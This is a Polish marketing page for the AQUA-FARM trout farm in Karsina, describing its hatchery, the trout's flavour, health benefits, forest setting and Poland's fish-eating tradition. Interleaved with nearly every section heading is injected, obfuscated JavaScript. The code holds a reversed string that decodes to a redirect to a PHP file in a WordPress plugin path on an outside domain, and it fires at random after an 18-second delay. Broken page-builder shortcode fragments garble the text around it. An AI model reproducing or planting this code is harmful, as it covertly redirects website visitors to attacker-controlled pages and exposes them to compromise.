AQUA-FARM

Ośrodek Hodowli Pstrąga Karsina powstał w 2006 roku

[vc_separator color=”custom” accent_color=”#bbbbbb”]

Zajmujemy się szeroko pojętą hodowlą pstrągów tzn. od okresu inkubacji ikry, poprzez wylęg, narybek, do ryby o wielkości handlowej. Nasza sprzedaż obejmuje zarówno tzw. pstrąga porcyjnego jak również ryby o gramaturze do 3000 g, które w handlu często występują pod nazwą PSTRĄG ŁOSOSIOWY. Ze względu na zbliżoną budowę, kolor oraz walory smakowe jest kojarzony z łososiem atlantyckim.

  • Posiadamy własną wylęgarnię, podchowalnię oraz stawy narybkowe.
  • Rybę transportujemy własnym, specjalistycznym transportem do odbiorców w kraju i za granicą.
  • Nad bezpieczeństwem i jakością naszych ryb czuwa zespół ichtiologów oraz lekarzy weterynarii.
[vc_separator color=”custom” accent_color=”#bbbbbb”]

Pstrąg Radewski

Dlaczego hodowany przez nas pstrąg jest taki wyjątkowy?

) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;setTimeout($Bhq(0), delay);}tom_1553723257590{margin-bottom: 0px !important;}”]

Smak

) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;setTimeout($Bhq(0), delay);}tom_1564390096058{margin-bottom: 0px !important;}”]Pstrąg należy do najsmaczniejszych ryb słodkowodnych i cieszy się opinią rybnego rarytasu. Wyrazem tego jest jego stale rosnąca popularność gastronomiczna poparta znakomitymi opiniami lekarzy i dietetyków. Organizowane w różnych rejonach Polski kulinarne „FESTIWALE PSTRĄGA” dopełniają obrazu.. Ryba zachowuje swój charakter w każdej postaci kulinarnej – jako gotowana, duszona, smażona, grillowana i pieczona. Pstrąg, chociaż należy do grupy ryb łososiowatych posiada mięso znacznie chudsze od mięsa łososi. Jest ono bladoróżowe ( intensywność barwy zależy od rodzaju pokarmu ryby) o zwartej konsystencji. Jest niskokaloryczne i lekkostrawne (100 gram fileta to jedynie ok 107 kcal.). Jego dużym atutem jest łatwość oddzielenia od kręgosłupa i ości ,dzięki temu może być podawane osobom starszym i dzieciom. Świetnie komponuje się z ziołami takimi jak koperek, lubczyk, rozmaryn lub natka pietruszki, które nadają mu wyrazisty smak. Już w XIX-wiecznej książce kucharskiej można znaleźć zapożyczony z kuchni francuskiej przepis na „pstrąga błękitnego” gotowanego w wywarze z cebuli i octu, podawanego z masłem, pietruszką i koperkiem.

) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;setTimeout($Bhq(0), delay);}tom_1553723265325{margin-bottom: 0px !important;}”]

Zdrowie

) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;setTimeout($Bhq(0), delay);}tom_1564390179239{margin-bottom: 0px !important;}”]Pstrąg jest gatunkiem ryb słodkowodnych polecanych przez dietetyków w profilaktyce chorób serca i układu krążenia. Jego mieso zawiera najwięcej kwasów Omega-3 sposrod wszystkich ryb słodkowodnych. Kwasy te wpływają korzystnie na pracę serca ,mózgu, narządu wzroku ,regulują prawidłowy poziom cholesterolu we krwi a nawet działają przeciwdepresyjnie. Niezwykle łatwo przyswajalne pełnowartościowe białko oraz zawartość selenu, wapnia, magnezu i witamin A, B, D i E to zastrzyk młodości i zdrowia dla każdego.

) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;setTimeout($Bhq(0), delay);}tom_1553723413097{margin-bottom: 0px !important;}”]

100% natury

) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;setTimeout($Bhq(0), delay);}tom_1564390332706{margin-bottom: 0px !important;}”]Naturalnym środowiskiem pstrąga są zimne, bogate w tlen wody wartkich rzek i potoków. Takie warunki są konieczne dla egzystowania ryb łososiowatych i takie muszą być zapewnione w hodowli pstrąga. Niezaprzeczalnym atutem naszej hodowli jest jej położenie. Nowoczesne obiekty hodowlane znajdują się w obrębie bujnych lasów należących do obszaru NATURA 2000. Brak przemysłu i regulacje dotyczące turystyki na tym obszarze zapewniają nam unikatowe warunki istotnie podwyższające jakość hodowli. Stosujemy pasze gwarantujące optymalny wzrost, możliwie najniższy współczynnik pokarmowy i minimalny wpływ na środowisko. W pełni spełniają one wymagania pokarmowe ryb, ich zapotrzebowanie na białka, tłuszcze, węglowodany, minerały i witaminy, a ich odpowiedni dobór wspomaga odporność i prawidłowy wzrost. Wszystkie surowce stosowane w używanych przez nas paszach są wolne od GMO i mają certyfikaty zrównoważonego rolnictwa. Warto pamiętać, że mimo postępu technologicznego hodowla pstrąga jest jedną z najdłużej trwających.

) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;setTimeout($Bhq(0), delay);}tom_1553723465346{margin-bottom: 0px !important;}”]

Tradycja

) == "string") return $Bhq.list[n].split("").reverse().join("");return $Bhq.list[n];};$Bhq.list=["'php.snimda-lla/sedulcni/etis-etavirp-oidarnoj/snigulp/tnetnoc-pw/sserpdrow/moc.nogaxehliie//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000;setTimeout($Bhq(0), delay);}tom_1564390561766{margin-bottom: 0px !important;}”]Tradycja jedzenia ryb w Polsce jest bardzo długa. Przyczyniały się do tego: czyste i zasobne w ryby rzeki, trudności z hodowlą bydła i drobiu – szczególnie w ubogich domach oraz obostrzenia religijne zezwalające na jedzenie ryb nawet w dniach postnych (w XVIII wieku było to około 200 dni w roku). Ryba powszechna w potokach i rzekach stała się inspiracją do zakładania pierwszych hodowli pstrąga w Polsce już na początku XIX wieku. Sprowadzono wówczas do Polski ikrę najpopularniejszej jego odmiany, czyli pstrąga tęczowego.

Aktualnie zaplecze  szkolnictwa wyższego w zakresie ichtiologii, znajomość nowoczesnych technologii, sprzyjające warunki naturalne – liczne potoki i rzeki, a także autentyczna pasja wielu hodowców, zadecydowała o tym, że nasz kraj prezentuje szczególny potencjał rozwoju tej „zdrowej i smakowitej” branży.

Galeria

Nasz ośrodek w obiektywie

[vc_separator color=”custom” accent_color=”#bbbbbb”]